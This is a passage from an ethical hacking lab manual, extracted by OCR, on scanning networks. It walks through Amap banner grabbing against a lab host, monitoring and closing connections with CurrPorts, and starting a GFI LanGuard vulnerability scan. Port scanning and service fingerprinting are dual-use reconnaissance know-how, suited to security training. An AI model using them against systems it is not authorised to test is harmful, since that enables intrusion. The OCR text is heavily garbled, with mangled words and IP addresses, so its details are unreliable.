  • 18. Module 03 - Scanning Networks ‫ד‬ FIGURE 3.2: AmapwithIP addressandwithrangeof switches 73-81 Lab Analysis Document all die IP addresses, open ports and their running applications, and die protocols you discovered during die lab. T ool/U tility Inform ation Collected/O bjectives Achieved Identified open port: 80 WebServers: ■ http-apache2‫־‬ ■ http-iis ■ webmin Amap U nidentified ports: ■ 10.0.0.4:75/tcp ■ 10.0.0.4:76/tcp ■ 10.0.0.4:77/tcp ■ 10.0.0.4:78/tcp ■ 10.0.0.4:79/tcp ■ 10.0.0.4:81/tcp Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited D :C E H -T oolsC EH u8 Module 03 S c a n n i n g N etw o r k B a n n e r G r a b b in g ToolsAMAP>amap I f . 0 . 0 . 4 7 5 - 8 1 laroap 0 5 . 2 <w w w . t h c . o r g / t h c - a n a p ) s t a r t e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 7 : 5 1 - MAPPING mode P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s h t t p P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s h t t p - a p a c h e - 2 W a rn in g: C ould n o t c o n n e c t < u n r e a c h a b le > t o 1 0 . 0 . 0 . 4 : 7 6 / t c p , d i s a b l i n g p o r t <EUN KN> W a rn in g : C ould n o t c o n n e c t < u n r e a c h a b le ) t o 1 0 . 0 . 0 . 4 : 7 5 / t c p , d i s a b l i n g p o r t <EUN KN> W a rn in g: C ould n o t c o n n e c t < u n r e a c h a b le > t o 1 0 . 0 . 0 . 4 : 7 7 / t c p , d i s a b l i n g p o r t <EUN KN> W a rn in g : C ould n o t c o n n e c t ( u n r e a c h a b l e ) t o 1 0 . 0 . 0 . 4 : 7 8 / t c p , d i s a b l i n g p o r t <EUN KN> W a rn in g : C ould n o t c o n n e c t < u n r e a c h a b le > t o 1 0 . 0 . 0 . 4 : 7 9 / t c p , d i s a b l i n g p o r t <EUN KN> W a rn in g: C ould n o t c o n n e c t < u n r e a c h a b le > t o 1 0 . 0 . 0 . 4 : 8 1 / t c p , d i s a b l i n g p o r t <EUN KN> P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s h t t p - i i s P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s webmin U n i d e n t i f i e d p o r t s : 1 0 . 0 . 0 . 4 : 7 5 / t c p 1 0 . 0 . 0 . 4 : 7 6 / t c p 1 0 . 0 . 0 . 4 : 7 7 / t c p 1 0 . 0 . 0 . 4 : 7 8 / k c p 1 0 . 0 . 0 . 4 : 7 9 / t c p 1 0 . 0 . 0 . 4 : 8 1 / t c p < t o t a l 6 > . Linap 0 5 . 2 f i n i s h e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 7 : 5 4 b :C E H -T o o lsC E H v 8 Module 03 S c a n n i n g N etw orkNBanner G r a b b in g ToolsAMAP> Compiles on all UNIX based platforms - even MacOS X, Cygwin on Windows, ARM-Linux and PalmOS C E H Lab M anual Page 101
  • 19. Module 03 - Scanning Networks P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Execute the Amap command for a host name with a port number other than 80. 2. Analyze how die Amap utility gets die applications running on different machines. 3. Use various Amap options and analyze die results. Internet Connection Required □ Noes0 Y Platform Supported □ iLabs0 Classroom Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 102
  • 20. Module 03 - Scanning Networks Monitoring TCP/IP Connections Using the CurrPorts Tool CurrPorts is netirork monitoringsoft!rare thatdisplaysthe list of allcurrently openedTCP/IP and UDPports onyourlocalcomputer. Lab Scenario 111 the previous lab you learned how to check for open ports using the Amap tool. As an ethical h acker and penetration tester, you must be able to block such attacks by using appropriate firewalls or disable unnecessary services running 011 the computer. You already know that the Internet uses a software protocol named TCP/ IP to format and transfer data. A11 attacker can monitor ongoing TCP connections and can have all the information in the IP and TCP headers and to the packet payloads with which he or she can hijack the connection. As the attacker has all die information 011 the network, he or she can create false packets in the TCP connection. As a netw ork administrator., your daily task is to check the TCP/IP connections of each server you manage. You have to monitor all TCP and UDP ports and list all the establish ed IP ad d resses of the server using the CurrPorts tool. Lab O bjectives The objective of diis lab is to help students determine and list all the TCP/IP and UDP ports of a local computer. 111 in this lab, you need to: ■ Scan the system for currently opened TCP/IP and UDP ports ■ Gather information 011 die ports and p ro cesses that are opened ■ List all the IP ad d resses that are currendy established connections ■ Close unwanted TCP connections and kill the process that opened the ports I CON KEY Valuable information Test your knowledge w Web exercise m Workbook review HU Tools dem onstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 103
  • 21. Module 03 - Scanning Networks Lab Environment To perform the lab, you need: ■ CurrPorts located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksScanning ToolsCurrPorts ■ You can also download the latest version of CurrPorts from the link http: / / www.nirsoft.11e t/utils/cports.html ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ A computer running W indows Server 2012 ■ Double-click cp o rts.exe to run this tool ■ Administrator privileges to run die CurrPorts tool Lab Duration Time: 10 Minutes aYou can download CuuPorts tool from http://www.nirsoft.net. Overview Monitoring TCP/IP Monitoring TCP/IP ports checks if there are multiple IP connections established Scanning TCP/IP ports gets information on all die opened TCP and UDP ports and also displays all established IP addresses on die server. Lab Tasks The CurrPorts utility is a standalone executable and doesn’t require any installation process or additional DLLs (Dynamic Link Library). Extract CurrPorts to die desired location and double click cports.exe to launch. 1. Launch Currports. It autom atically displays the process name, ports, IP and remote addresses, and their states. TASK 1 ‫י‬*1‫״‬1‫־‬rCurrPorts File Edit View Option* Help x S D ® v ^ ! t a e r 4* a -* ProcessNa.. Proces... Protocol Local... Loc.. Local Address Rem... Rem... Rercte Address Remote Host Nam (T enroare.ere 2 m TCP 4119 10.0.0.7 80 http 173.194.36.26 bcm04501-in‫־‬f26.1 f ct1rome.ere 2988 TCP 4120 10.0.0.7 80 http 173.194.3626 bom04s01-in-f26.1 chrome.e5re 2988 TCP 4121 10.0.0.7 80 http 173.194.3626 bom04501‫־‬in‫־‬f26.1 f ehrome.ere 2 m TCP 4123 10.0.0.7 80 http 215720420 a23-57-204-20.dep CTchrome.«e 2 m TCP 414S 10.0.0.7 443 https 173.1943626 bomOdsOI-in-f26.1 ^ firtfc x ere 1368 TCP 3981 127.0.0.1 3982 12700.1 WIN-D59MR5HL9F £fir«fcx«x• 1368 TCP 3982 127.0.0.1 3981 12700.1 WIN-D39MR5HL9E (£fir«fcx «(« 1368 TCP 4013 10.007 443 https 173.1943622 bom01t01‫־‬in-f22.1 fircfcx.cxc 1368 TCP 4163 1000.7 443 httpj 173.19436.15 bom04!01•in-flS.1 f 1rcfcxc.cc 1368 TCP 4166 100.0.7 443 httpj 173.194360 bcm04501-in-f0.1« firefcx c.<c 1368 TCP 4168 100.0.7 443 http; 74.125234.15 gra03s05in-f15.1e s, httpd.exe 1000 TCP 1070 00.0.0 0.0.0.0 thttpd.exe 1800 TCP 1070 = Qlsass.occ 564 TCP 1028 0.0.0.0 0.0.0.0 3 l» 5 5 a e 564 TCP 1028 = ____ »_____ <1 ■>1 T > NirSoft F reew are. ht1p;/AnrA«v.rirsoft.net79 ~ctal Ports. 21 RemoteConnections. 1Selected Discover TCP/IP Connection C E H Lab M anual Page 104 Ethical H acking and Counterm easures Copyright © by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited
  • 22. Module 03 - Scanning Networks FIGURE 4.1:Tlie CuaPoits mainwindowwith allprocesses, ports, and IP addresses 2. CiirrPorts lists all die processes and their IDs, protocols used, local and remote IP address, local and remote ports, and remote host names. 3. To view all die reports as an HTML page, click View ‫־‬> HTML Reports ‫־‬All Items. M °- x ‫י‬CurrPorts Remote Host Nam * bcm Q 4s0l-in‫־‬f26.1 bcm 04s0l-in-f26.1 bcm04s01 -in-f26.1 a23-57-204-20.dep S bom04501-in‫־‬f26.1 W IN-D39MR5HL9E W IN-D39MR5HL9E bem04s01-in-f22.1 bom04i01‫־‬in*f15.1 bom04s0l*in-f0.1< gruC3s05-1n‫־‬fl5.1e Remote Address 173.1943526 173.194.3526 173.194.3526 23.5720420 173.194.3526 127.0.0.1 127.0.0.1 173.1943622 173.19436.15 173.19436.0 741252*4.15 0.0.0.0 0.0.0.0 Rem.. http http http http https https https https https 443 3962 3981 443 443 443 443 Address ).7 ).7 ).7 ).7 ).7 .0.1 .0.1 ShowGrid Lines ShowTooltips Mark Odd/Even Rows HTML Report ‫־‬ All I'errs F5 --- TV.V,0.7 10.0.0.7 10.0.0.7 100.0.7 o.ao.o aaao File Edit I View | O ptions Help X B 1 Process KJa 1 ^ I chrom e. C * ch ro m e l ^ chrom e. C * chrom e. ^ chrom c. (£ fir c fc x .c g f - e f c x e R‫״‬fr# {h (p firc fo x .e 1(c ‫ס‬7‫קז‬ 1l i (Bfaefcxue 1368 TCP JftfM cotae I368 TCP ® fr e f c x e t e 1368 TCP h tto d . e x e 1800 TCP Vhttpd.exe 1800 TCP Qlsassete 564 TCP 561 TCP HTML Report - Selected terns Choose Columns Auto SizeColumns 4163 4156 4108 1070 1070 1028 1028 NirSoft F reew are. http‫־‬.//w w w .rirsoft.net79Tct«l Ports, 21 Remote Connection!, 1 Selected FIGURE 4.2 The CunPortswithHTMLReport- AllItems 4. The HTML Report automatically opens using die default browser. E<e Ldr View History Bookmarks 1001‫צ‬ Hdp I TCP/UDPPortsList j j f j_ ^ (J ft e ///C;/User1/Administralor/Desfctop/cp0fts-xt>£,repcriJitml ' ‫•£־־־*־‬ - Google P ^ TC P/U D P Ports List Created bv using CurrPorts ‫י‬ = P m « j .Nam• Protiti ID Protocol I.oral Port IAral Port Na*e Local Addivit Remote Port ‫׳‬RcmoU Port .Name Rtmvl« Addrtit chxame rxc 2988 TCP 4052 10 00 7 443 https 173 194 36 4 bo chiome.exc 2988 TCP 4059 10.0.0.7 80 http 173.194.36.17 bo ch101nc.exe 2988 TCP 4070 10.0.0.7 80 http 173.194.36.31 bo daome.exe 2988 TCP 4071 10.0.0.7 80 hltp 173.194.36.31 bo! daome.exe 2988 TCP 4073 100.0.7 80 hltp 173.194.36.15 boi daome.exe 2988 TCP 4083 10.0.0.7 80 http 173.194.36.31 bo! cfcrorae.exe 2988 TCP 4090 100.0.7 80 hnp 173.194.36.4 bo! chfomc.cxc 2988 TCP 4103 100.0.7 80 hltp 173.194.36.25 bo bo > chrome exe 2988 TCP 4104 10 00 7 80 hnp 173 194 36 25 FIGURE 4.3:Hie Web browser displayingCunPorts Report- AllItems 5. To save the generated CiirrPorts report from die web browser, click File ‫־‬> Save Page As...Ctrl+S. / / CurrPorts utility is a standalone executable, which doesn't require any installation process or additional DLLs. Q In the bottom left of the CurrPorts window, the status of total ports and remote connections displays. E3To check the countries of the remote IP addresses, you have to download the latest IP to Country file. You have to put the IpToCountry.csv‫״‬ file in the same folder as cports.exe. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 105
  • 23. Module 03 - Scanning Networks ■3 5‫ד‬TCP/UDP Ports List - Mozilla Firefox ‫ק‬ ‫ז‬ ‫ו‬ i d * «1ry> H ito ry Bookm aikt Took H rlp P *C • ! 1 ‫־‬ Google»f1‫׳‬Dcsttop/q)D1ts-x64/rEpor: htm l fJcw l i b C W *T Window/ Ctr1*N Cpen F ie .. CcrUO S *.« Page As.. Ctr1*S Send Link- Pag* Setup-. Prm tP i& K w Errt. tl* !.oral Port I o ral Port Name Local A d d rv u Remote Pori Kemotc Port Name Keu1ul« A d d n it!,ro tifjj >111• ID rrotocol chiome.cxc 2988 TCP 4052 10.0.0.7 443 https 173.194.36.4 boj cfc10 me.exe 2988 TCP 4059 10.0.0.7 80 http 173.194.36.17 bo: chrome.exe 2988 TCP 4070 10.0.0.7 80 hnp 173.194.36.31 bo: chrome.exe 2988 TCP 4071 10.0.0.7 80 http 173.194.36.31 boi chrome exe 2988 TCP 4073 100 0 7 80 http 173 194 36 15 boi chrome exe 2988 TCP 408; 100 0 7 80 http 173 194 36 31 boi chrome exe 2988 TCP 4090 100 0 7 80 http 173 194 36 4 boi chiome.cxe 2988 TCP 4103 10.0.0.7 80 http 173.194.36.25 boi daome.exe 2988 TCP 4104 10.0.0.7 80 http 173.194.36.25 b03 FIGURE 4.4: TheWeb browserto SaveCurrPorts Report- AllItems 6. To view only die selected report as HTML page, select reports and click V iew ‫>־‬ HTML Reports ‫־‬ S elected Items. 1- 1° ‫׳‬ x -CurrPorts Address Rem... Rem... RemoteAddress Remote Host Nam ).7 80 http 175.19436.26 bom04s01-1n‫־‬f26.1 ).7 80 http 173.1943626 bom04s01-1n‫־‬f26.1 F 80 http 173.1943626 bcm04s01-in‫־‬f26.1f ■0.7 80 http 215720420 323-57-204-20.dep P7 443 http: 173.1943526 bcm04s0l-in-f26.1 .0.1 3982 12700.1 WIN-D39MR5HL9E .0.1 3981 12700.1 WIN-D39MR5HL9E J>.7 443 https 173.1943622 bom04s01-in-f22.1 File Edit | View | Option) Help X S (3 ShowGrid L‫אחו‬ ProcessNa P I ShowTooltips C chrome. Mark Odd/Even Rows HTML Report - All Items HTML Report ■ Selected terns C c h ro m e f O 'chrom e “ Ctrl♦■Plus F5 Choose Columns ®,firefcxe Auto SizeColumns (g fir c f c x e : Refresh fircfcx e<v fircfox.exe 1368 TCP 4163 1000.7 443 http; 173.194,36.15 bomOlsOI -in‫־‬f15.1 fircfcx.cxc 1368 TCP 4166 1000.7 443 http: 173.194360 bomOlsOI -in‫־‬f0.1c ^fircfcx.ccc 1368 TCP 416S 100.0.7 443 https 74125234.15 gruC3s05 in-f15.1c httpd.exe 1000 TCP 1070 0.0.0.0 0.0.0.0 ^ httpd.exe 1000 TCP 1070 s Qlsassexe 564 TCP 1028 00.0.0 0.0.0.0 Q lsaw ac 564 TCP 1028 « ---------a.------- 14nn Trn ‫י«׳*־ו־‬ __ AAAA AAAA HirSoft F reew are. h ttp . ‫׳‬,‫׳‬ ,w w w .r irs o ft.n e t79'ctel Ports. 21 RemoteConnections, 3Selected FIGURE4.5:CurrPortswithHTMLReport- SelectedItems 7. The selected report automatically opens using the default browser. m CurrPorts allows you to save all changes (added and removed connections) into a log file. In order to start writingto the log file, check the ,Log Changes' option under the File menu 2Zy" By default, the log file is saved as cports.log in the same folder where cports.exe is located. You can change the default log filename by setting the LogFilename entry in the cports.cfg file. ^ Be aware! The log file is updated only when you refresh the ports list manually, or when the Auto Refresh option is turned on. a You can also right- click on the Web page and save the report. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 106
  • 24. Module 03 - Scanning Networks TCP/UDPPorts List - Mozilla Firefox I 1‫־‬ n J~x ffi'g |d: V‫־‬»cv» Hatory Bookmaiks Toob Help [ ] TCP/UDPPortsList | + ^ W c /'/C /lh e rv ‫׳‬Admin 1strotor/Dr5fctop/'cport5‫־‬r 64/rcpo‫די‬i«0T1l (?‫־‬ GoogleP |,f t I TC P /V D P Ports List Created by ining CiirrPom Process Name Process ID Protocol Local Port I>ocal Port .Name Local Address Reuiotv Port Remote Port Name Kvuiotc Address Remote Host Name State dbiome.cxc 2988 TCP 4148 10.0.0.7 443 https 173.194.36-26 bom04sC1 m. £26.1e100.net Established c: firefox exe 1368 TCP 4163 10 0 0 7 443 https 173 194 36 15 bom04s01 tn-fl 5.Iel00.net Established C: hUpdcxc 1800 TCP 1070 Listening C: In the filters dialog bos, you can add one or more filter strings (separated by spaces, semicolon, or CRLF). FIGURE 4.6: TheWeb browserdisplayingCuaPortswithHTMLReport- SelectedItems 8. To save the generated CurrPorts report from the web browser, click File ‫>־‬ S ave P age As...Ctrl+S ‫׳‬ r= > r* ‫י‬TCP/‫׳‬UDP Ports List ‫־‬ Mozilla Firefox fi *»r/Deslctop/cpo»tsx6A<repwthtml Edfe Vir* Hutory Boolvfmki Took HWp N**‫׳‬T*b Clrl-T | + | an*N OpenFie... Ctrl»0 Ctrl-SPageA;.S*.« Sir'd lin k - Established C Established C Remote Ilotl .Nioit boxu04s01-ui-1‘26.Iel00.net bom04s01-1a-115.lel00.net Remote Address 173.1943626 173.19436 15 Kcmole Port Name https https Toral Remote Address Port 1000.7 443 443100.0.7 Local Port Name Local PoriID Page :er.p. PnntPreview PrmL. ficit Offline Name 4148TCP2988chtoxne.exe 41631368 TCPfiiefox-cxc 0‫׳‬10TCP1800httpdexe FIGURE 4.7:TheWeb brcnvserto Saw QirrPortswith HTMLReport- SelectedItems 9. To view the properties of a port, select die port and click File ‫>־‬ Properties. / / The Syntax for Filter String: [include | exclude]: [local | remote | both | process]: [tcp | udp | tcpudp] : [IP Range | Ports Range]. ‫ש‬ Command-line option: /stext <F11ename> means save the list of all opened TCP/UDP ports into a regular text file. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 107
  • 25. Module 03 - Scanning Networks r ® CurrPorts I - ] “ ' * m1 File J Edit View Options Help I PNctlnfo CtrM CloseSelectedTCPConnections Ctri+T Local Address Rem... Rem.. Remote Address Remote Host Nam 1‫י׳‬ Kill Processes Of Selected Ports 10.0.0.7 80 http 173.194.3626 bom04301-in-f26.1 SaveSelected Items CtiUS 10.0.0.7 80 http 3.194.3626‫׳־‬1 bom04501‫־‬in-f26.1 Properties Alt^Entei 1 10.0.0.7 80 http 1^3.194.36.26 bom04s01-in-f26.1 10.0.0.7 80 http 23.57.204.20 a23*57204-20‫.־‬dep ■ ProcessProperties CtiUP 10.00.7 443 https 1Ti 194.36.26 bom04s01-in-f2M Log Changes 127.0.0.1 3982 127.aa1 WIN-D39MR5Hl9f Open Log File 127.0.0.1 3031 127.0L0L1 WIM-D30MRSH10F Clear Log File 10.0.0.7 443 httpt 1 194.3622,‫־‬1 bom04e01-m‫־‬f22.1 Advanced Options CtrUO 10.0.0.7 443 https 173.194.3615 bom04s01-in-f15.1 10.0.0.7 443 https 173.194.360 bom04s01 m‫־‬f0.1c Exit 10.0.0.7 443 https 74.12523415 gru03s05-in‫־‬f15.1e j 1ttjd.exe 1800 TCP 1070 oaao 0DS)S) httod.exe 1800 TCP 1070 :: □ lsass.exe 564 TCP 1028 aao.o 0DSJJJ Qlsass-exe $64 TCP 1028 r. ‫״‬ ‫־‬T > |79 Tctel Ports, 21 RemoteConnections, 1Selected NirSoft Freeware, http:/wvrw.nircoft.net b&i Command-line option: /stab <Filename> means save the list of all opened TCP/UDP ports into a tab-delimited text file. FIGURE 4.8: CunPorts to viewproperties for a selected port 10. The Properties window appears and displays all the properties for the selected port. 11. Click OK to close die Properties window *Properties firefox.exe 1368 TCP 4166 10.0.0.7 443 |https_________________ 1173.194.36.0 bom04s01-in-f0.1 e 100.net Established C:Program Files (x86)M 0zilla Firefoxfirefox.exe Flrefox Firefox 14.0.1 M ozilla Corporation 8/25/2012 2:36:28 PM W IN-D 39M R 5HL9E4Adm inistrator 8/25/2012 3:32:58 PM Process Name: Process ID: Protocol: Local Port: Local Port Name: Local Address: Rem ote Port: Rem ote Port Name: Rem ote Address: Rem ote Host Name: State: Process Path: Product Name: File Description: File Version: Company: Process Created On: User Name: Process Services: Process Attributes: Added On: Module Filenam e: Rem ote IP Country: W indow Title: OK Command-line option: / shtml <Filename> means save the list of all opened TCP/UDP ports into an HTML file (Horizontal). FIGURE 4.9:Hie CunPorts Propertieswindowfor the selectedport Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 108
  • 26. Module 03 - Scanning Networks 12. To close a TCP connection you think is suspicious, select the process and click File ‫>־‬ C lose S elected TCP C onnections (or Ctrl+T). - _ , » r‫ד‬CurrPorts IPNetlnfo Clrf♦■‫ו‬ Close Selected TCPConnections Ctrl-T Local Address Rem... Rem... RemoteAddress Remote Host Nam I‫י׳‬ Kill ProcessesOfSelected Ports 10.0.0.7 60 http 173.19436.26 bom04s01-in‫־‬f26.1 SaveSelected Items CtH-S 10.0.0.7 80 http 173.19436.26 bom04s01-in‫־‬f26.1 Properties Process Properties AH-Enter Ctrl—P 10.0.0.7 10.0.0.7 10.0.0.7 80 80 443 http http https 173.19436.26 23.5730430 173.19436.26 bom04sC1 in-f26.1 023-57 204 2C.dep bom04s01 in‫־‬f26.1 = Log Changes 127.00.1 3932 127.0.0.1 WIN-D39MR5HL9e Cpen Log File 127.00.1 3931 127.0.0.1 WIN-D39MR5HL9£ Clear Log File 10.0.0.7 443 http: 173.19436.22 bom04s01-in-f22.1 Ad/snced Options Ctrl+0 10.0.0.7 443 https 173.19436.15 bom04s01-in-f15.1 443 https 173.19436.0 bom04s01■in-f0.1s Exit 10.0.0.7 443 https 74.125.234.15 gru03s05-in-f151e ^ httpd.exe 1£03 TCP 1070 0D.0.0 0.0.0.0 httpd.exe 1800 TCP 1070 r □isass^xe 564 TCP 1028 o m o o.aao QtoSfcCNe 564 TCP 1Q28 r ^ J III ‫ד‬ ‫״‬­ I> HirSoft freeware. r-tto:‫׳‬v/Yv*/n rsott.net7?Tot«! Porte, 21 RemoteConnection! 1Selected FIGURE 4.10; ,Hie CunPoits CloseSelectedTCP Connections optionwindow 13. To kill the p ro cesses o f a port, select die port and click File ‫>־‬ Kill P ro cesses of S elected Ports. I~ I‫ם‬ ' *CurrPorts File j Edit View Options Help Loral Addrect Rem... fam.. Remote Addrect Remote Host Nam * 10.0.07 80 http 173.14436.26 bom04t01*in-f26.1 10.0.0.7 80 http 173.194.3626 bomC4t01-in‫־‬f26.1 10.0.0.7 80 http 173.194.3626 bomC4j01-in-f26.1 10.0.0.7 80 http 215720420 a23-57-204-20.dep s 10.0.0.7 443 https 173.1943636 bcmC4s01-in-f26.1 127.0.0.1 3962 127.0.0.1 WIN-D39MR5HL9E 127.0.0.1 3981 127.0.0.1 WIN-D39MR5HL9E 10.0.0.7 443 https 173.1943632 bomC4s01-in-f22.1 10.0.0.7 443 https 173.19436.15 bom04s01‫־‬in‫־‬f15.1 10.0.0.7 443 https 173.19436.0 bom04s0l‫־‬in‫־‬f0.1e 10.0.0.7 443 https 74125334.15 gru03s05-1n-M5.1e an♦! Clil^T P N e tln fo Close Selected T C P C onnection! kin Processes Of Selected Ports Ctrt-S A t-Enter CtrKP Save Selected Items Pro p e rtie c P ro c e s s P ro p e rtie s Log Changes Open Log File Clear Log file Advanced Options Exit 0.0.0.0O.Q.Q.O o.aao ___ /)A A A V htt3d.exe 1800 TCP 1070 Vbttpd.exe 1800 TCP 1070 □l«ss.ete 564 TCP 1028 □ katc *1* 561 TCP 1028 ‫ר‬ II MirSoft Freew are. http -Jta /w w .rirso ft.n e t79Tctel Ports, 21 RemoteConnections, 1Selected FIGURE 4.11: The CurrPorts KillProcesses ofSelectedPorts OptionWindow 14. To exit from the CurrPorts utility, click File ‫>־‬ Exit. The CurrPorts window clo ses. S TASK 2 Close TCP Connection f i T A S K 3 Kill Process Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 109
  • 27. Module 03 - Scanning Networks ’-‫׳‬1- 1°CurrPons File Edit View Options Help PNetlnfo QH+I CloseSelectedTCPConnections CtrKT .. Local Address Rem... Rem‫״‬ Remcte Address Remcte Host Nam Kil ProcessesOf Selected Ports 10.0.0.7 80 http 173.194.36.26 bom04s01-in-f26.1 SaveSelected Items Ctrfc-S 10D.0.7 80 http 173.194.3626 bom04s01-in-f26.1 Properties Process Properties At-Eater CtH«‫־‬P 10.0.0.7 10.0.0.7 10.0.0.7 80 80 443 http http https 173.194.3626 21572Q420 173.194.3626 bom04s01-in‫־‬f26.1r a23-57-204-20.deJ bom04t01-in-f26.1| log Changes 127.0.0.1 3987 127DD.1 WIN-D39MR5H19P Open Log File 127.0.0.1 3981 127X10.1 WIN-039MR5HL9E Clear Log File 10.0.0.7 443 https 173.194.36-22 bomC4101-in-f22.1 Advanced Option! CtH-0 10.0.0.7 443 https 173.194.36.1S bomC4i01 in‫־‬f15.1 10.0.0.7 443 https 173.194.36i) bcmC4s01 in f0.1q Ext 1 10.0.0.7 443 https 74.125.234.15 gru03sG5in-f15.1e thttpd.exe 1800 TCP 1070 0.0.0.0 0.0.0.0 thttpd.exe 1800 TCP 1070 = = Qlsas&cxe 564 TCP 1028 0.0.00 0.0.0.0 Hlsais-ae 564 TCP 1028 = ‫־־‬ ■ rrn itnt __ /‫ו‬ a /a AAAA Nil Soft free were. Mtpy/vvwvv.rit soft.net79 Tctal Ports. 21 Remote Connections. 1 P ie ced h id Command-line option: / sveihtml <Filename> Save the list of all opened TCP/UDP ports into HTML file (Vertical). FIGURE 4.12: The CurrPoits Exit optionwindow Lab Analysis Document all die IP addresses, open ports and dieir running applications, and protocols discovered during die lab. T ool/U tility Inform ation Collected/O bjectives Achieved Profile Details: Network scan for open ports Scanned Report: ■ Process Name ■ Process ID ■ Protocol CurrPorts ■ Local Port ■ Local Address ■ Remote Port ■ Remote Port Name ■ Remote Address ■ Remote Host Name feUI In command line, the syntax of / close command:/close <Local Address> <Local Port> <Remote Address> <Remote Port‫נ‬ *. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 110
  • 28. Module 03 - Scanning Networks P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions Analyze the results from CurrPorts by creating a filter string that displays only packets with remote TCP poit 80 and UDP port 53 and running it. Analyze and evaluate die output results by creating a filter that displays only die opened ports in die Firefox browser. Determine the use of each of die following options diat are available under die options menu of CurrPorts: a. Display Established b. Mark Ports O f Unidentified Applications c. Display Items Widiout Remote Address d. Display Items With Unknown State Internet Connection Required □ Yes 0 No Platform Supported 0 Classroom 0 !Labs 1. ‫.כ‬ Q CurrPorts allows you to easily translate all menus, dialog boxes, and strings to other languages. Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 111
  • 29. Module 03 - Scanning Networks Lab Scanning for Network Vulnerabilities Using the GFI LanGuard 2012 GFILANgwrd scansnetworksandports to detect, assess, andcorrectany security vulnerabilities thatarefound. Lab Scenario You have learned in die previous lab to monitor TCP IP and UDP ports 011 your local computer or network using CurrPorts. This tool will automatically mark widi a pink color suspicious TCP/UDP ports owned by unidentified applications. To prevent attacks pertaining to TCP/IP; you can select one or more items, and dien close die selected connections. Your company’s w eb server is hosted by a large ISP and is well protected behind a firewall. Your company needs to audit the defenses used by die ISP. After starting a scan, a serious vulnerability was identified but not immediately corrected by the ISP. An evil attacker uses diis vulnerability and places a backdoor on the server. Using die backdoor, the attacker gets complete access to die server and is able to manipulate the information 011 the server. The attacker also uses the server to leapfrog and attack odier servers 011 the ISP network from diis compromised one. As a security administrator and penetration tester for your company, you need to conduct penetration testing in order to determine die list of threats and vulnerabilities to the network infrastructure you manage. 111 diis lab, you will be using GFI LanGuard 2012 to scan your network to look for vulnerabilities. Lab O bjectives The objective of diis lab is to help students conduct vulnerability scanning, patch management, and network auditing. 111 diis lab, you need to: ■ Perform a vulnerability scan I CON KEY Valuable information ✓ Test your knowledge Web exercise Q Workbook review ZU Tools dem onstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 112
  • 30. Module 03 - Scanning Networks ■ Audit the network ■ Detect vulnerable ports ■ Identify sennit}‫־‬vulnerabilities ■ Correct security vulnerabilities with remedial action Lab Environm ent To perform die lab, you need: ■ GFI Languard located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksWulnerability Scanning ToolsGFI LanGuard ■ You can also download the latest version of GFI Languard from the link http://www.gfi.com/la1111etsca11 ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ A computer running Windows 2012 Server as die host machine ■ Windows Server 2008 running in virtual machine ■ Microsoft ■NET Framework 2.0 ■ Administrator privileges to run die GFI LANguard Network Security Scanner ■ It requires die user to register on the GFI w ebsite http: / / www.gii.com/la1111etsca11 to get a license key ■ Complete die subscription and get an activation code; the user will receive an email diat contains an activation code Lab Duration Time: 10 Minutes O verview of Scanning N etw ork As an adminisuator, you often have to deal separately widi problems related to vulnerability issues, patch m anagement, and network auditing. It is your responsibility to address all die viilnerability management needs and act as a virtual consultant to give a complete picture of a network setup, provide risk analysis, and maintain a secure and compliant network state faster and more effectively. Security scans or audits enable you to identify and assess possible risks within a network. Auditing operations imply any type of checking performed during a network security audit. These include open port checks, missing Microsoft patches and vulnerabilities, service infomiation, and user or process information. Q You can download GFI LANguard from http:/ /wwwgfi.com. Q GFI LANguard compatiblyworks on Microsoft Windows Server 2008 Standard/Enterprise, Windows Server 2003 Standard/Enterprise, Windows 7 Ultimate, Microsoft Small Business Server 2008 Standard, Small Business Server 2003 (SP1), and Small Business Server 2000 (SP2). C -J GFI LANguard includes default configuration settings that allowyou to run immediate scans soon after the installation is complete. Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 113
